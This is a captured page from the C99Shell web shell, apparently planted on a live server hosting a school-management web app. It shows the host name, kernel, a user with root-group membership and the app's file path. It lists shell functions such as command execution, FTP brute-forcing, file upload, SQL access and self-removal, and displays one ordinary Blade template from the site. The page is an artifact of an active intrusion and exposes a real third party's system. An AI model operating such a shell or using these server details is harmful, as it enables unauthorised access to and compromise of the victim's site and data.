!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/resources/views/admin/class/   drwxr-xr-x
Free 29.21 GB of 117.98 GB (24.76%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     sections.blade.php (2.63 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="eoff-form">
    <form method="POST" enctype="multipart/form-data" class="d-block ajaxForm" action="{{ route('admin.section.update', ['id' => $class_id]) }}">
        @csrf 
        <?php $count 0?>
        @foreach($sections as $section)
            <?php $count++; ?> 
            @if($count == 1)
                <div class="input-group me-2 mb-2">
                        <input type="hidden" class="form-control eForm-control" id="section{{ $section->id }}" name = "section_id[]" value="{{ $section->id }}">
                        <input type="text" class="form-control eForm-control" id="name" name = "name[]" value="{{ $section->name }}" required>

                        <button class="btn btn-icon btn-success" type="button" onclick="appendSection()"><i class="bi bi-plus"></i></button>
                </div>
            @endif

            @if($count != 1)
                <div class="input-group me-2 mb-2" id="sectionDatabase{{ $section->id }}">
                        <input type="hidden" class="form-control eForm-control" id="section{{ $section->id }}" name = "section_id[]" value="{{ $section->id }}">
                        <input type="text" class="form-control eForm-control" name = "name[]" value="{{ $section->name }}" required>

                        <button class="btn btn-icon btn-danger" type="button" onclick="removeSectionDatabase('{{ $section->id }}')"><i class="bi bi-dash"></i></button>
                </div>
            @endif

        @endforeach
        <div id = "section_area"></div>
        <div class="row no-gutters">
        <div class="form-group  col-md-12 p-0 mt-2">
            <button class="eBtn eBtn btn-primary ms-2" type="submit">{{ get_phrase('Update') }}</button>
        </div>
    </div>
    </form>
</div>

<div id = "blank_section" class="d-hidden">
    <div class="input-group me-2 mb-2">

            <input type="hidden" class="form-control eForm-control" name = "section_id[]" value="0">
            <input type="text" class="form-control eForm-control" name = "name[]" value="" required>

            <button class="btn btn-icon btn-danger" type="button" onclick="removeSection(this)"><i class="bi bi-dash"></i></button>
    </div>
</div>


<script type="text/javascript">
  
    "use strict";

    var blank_section_field = $('#blank_section').html();


    function appendSection() {
        $('#section_area').append(blank_section_field);
    }

    function removeSection(elem) {
        $(elem).closest('.input-group').remove();
    }

    function removeSectionDatabase(section_id) {
        $('#sectionDatabase'+section_id).hide();
        $('#section'+section_id).val(section_id+'delete');
    }
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--